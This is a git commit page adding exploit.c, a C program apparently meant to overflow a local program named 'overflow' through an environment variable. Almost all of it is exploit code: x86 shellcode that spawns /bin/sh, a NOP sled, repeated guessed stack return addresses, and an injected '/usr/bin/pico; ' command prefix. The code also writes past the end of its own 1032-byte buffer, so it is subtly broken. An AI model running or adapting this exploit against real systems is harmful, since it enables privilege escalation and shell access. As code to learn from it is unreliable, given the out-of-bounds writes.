diff options
| author | dev0 <matzeton@googlemail.com> | 2012-01-30 16:10:35 +0100 |
|---|---|---|
| committer | dev0 <matzeton@googlemail.com> | 2012-01-30 16:10:35 +0100 |
| commit | 8d64f054048f6402dedbaef11ea5d0f7bd8d530f (patch) | |
| tree | 87595d67270dc83ac4781a3815a743ded628b183 /exploit.c | |
first commit
Diffstat (limited to 'exploit.c')
| -rw-r--r-- | exploit.c | 51 |
1 files changed, 51 insertions, 0 deletions
diff --git a/exploit.c b/exploit.c new file mode 100644 index 0000000..3137c91 --- /dev/null +++ b/exploit.c @@ -0,0 +1,51 @@ +/* + * main.c + * + * Created on: 27.01.2012 + * Author: druid + */ + +#include <unistd.h> +#include <stdio.h> +#include <stdlib.h> +#include <fcntl.h> +#include <sys/stat.h> +#include <string.h> + +#define PATH_CT "./overflow" +#define ENV_VAR "EXPLOIT" +#define NOP 0x90 + + +static char shellcode[]= +"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d" +"\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58"; + +u_long +esp() +{ + __asm__("movl %esp, %eax"); +} + +int +main() +{ + + u_char buf[1032]; + u_long addr; + int i; + + strcpy(buf, "/usr/bin/pico; "); + + addr = esp() - 192; + for (i = 16; i < 128 + 16; i += 4) + *((u_long *) (buf + i)) = addr; + for (i = 128 + 16; i < 1040; i++) + buf[i] = 0x90; + for (i = 0; i < strlen(shellcode); i++) + buf[1040 + i] = shellcode[i]; + buf[1040 + i] = '\n'; + + setenv(ENV_VAR, buf, 1); + execl(PATH_CT, "overflow", (char *) 0); +} |